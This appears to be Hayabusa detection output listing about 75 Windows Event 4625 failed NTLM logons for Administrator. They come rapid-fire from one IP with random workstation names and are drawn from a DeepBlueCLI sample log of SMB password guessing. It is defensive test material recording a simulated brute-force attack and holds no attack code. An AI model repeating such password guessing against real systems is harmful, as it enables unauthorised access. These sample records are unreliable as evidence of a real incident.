12862016-09-20 01:50:17.277 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12872016-09-20 01:50:17.312 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12882016-09-20 01:50:17.357 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12892016-09-20 01:50:17.414 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12902016-09-20 01:50:17.453 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12912016-09-20 01:50:17.486 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12922016-09-20 01:50:17.524 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12932016-09-20 01:50:17.563 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12942016-09-20 01:50:17.605 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12952016-09-20 01:50:17.648 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12962016-09-20 01:50:17.692 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12972016-09-20 01:50:17.728 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12982016-09-20 01:50:17.866 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12992016-09-20 01:50:17.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13002016-09-20 01:50:17.965 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13012016-09-20 01:50:18.009 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13022016-09-20 01:50:18.051 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13032016-09-20 01:50:18.093 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13042016-09-20 01:50:18.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13052016-09-20 01:50:18.175 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13062016-09-20 01:50:18.213 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13072016-09-20 01:50:18.260 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13082016-09-20 01:50:18.292 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13092016-09-20 01:50:18.337 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13102016-09-20 01:50:18.372 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13112016-09-20 01:50:18.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13122016-09-20 01:50:18.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13132016-09-20 01:50:18.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13142016-09-20 01:50:18.597 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13152016-09-20 01:50:18.630 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13162016-09-20 01:50:18.666 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13172016-09-20 01:50:18.712 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13182016-09-20 01:50:18.743 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13192016-09-20 01:50:18.776 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13202016-09-20 01:50:18.808 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13212016-09-20 01:50:18.847 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13222016-09-20 01:50:18.888 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13232016-09-20 01:50:18.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13242016-09-20 01:50:18.959 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13252016-09-20 01:50:18.999 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13262016-09-20 01:50:19.043 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13272016-09-20 01:50:19.085 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13282016-09-20 01:50:19.127 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13292016-09-20 01:50:19.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13302016-09-20 01:50:19.217 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13312016-09-20 01:50:19.261 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13322016-09-20 01:50:19.300 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13332016-09-20 01:50:19.350 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13342016-09-20 01:50:19.388 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13352016-09-20 01:50:19.432 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13362016-09-20 01:50:19.539 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13372016-09-20 01:50:19.602 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13382016-09-20 01:50:19.670 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13392016-09-20 01:50:19.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13402016-09-20 01:50:19.759 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13412016-09-20 01:50:19.801 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13422016-09-20 01:50:19.837 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13432016-09-20 01:50:19.875 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13442016-09-20 01:50:19.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13452016-09-20 01:50:19.965 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13462016-09-20 01:50:20.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13472016-09-20 01:50:20.039 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13482016-09-20 01:50:20.091 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13492016-09-20 01:50:20.132 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13502016-09-20 01:50:20.173 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13512016-09-20 01:50:20.215 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13522016-09-20 01:50:20.252 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13532016-09-20 01:50:20.288 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13542016-09-20 01:50:20.326 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13552016-09-20 01:50:20.363 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13562016-09-20 01:50:20.417 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13572016-09-20 01:50:20.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13582016-09-20 01:50:20.501 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13592016-09-20 01:50:20.543 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13602016-09-20 01:50:20.580 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
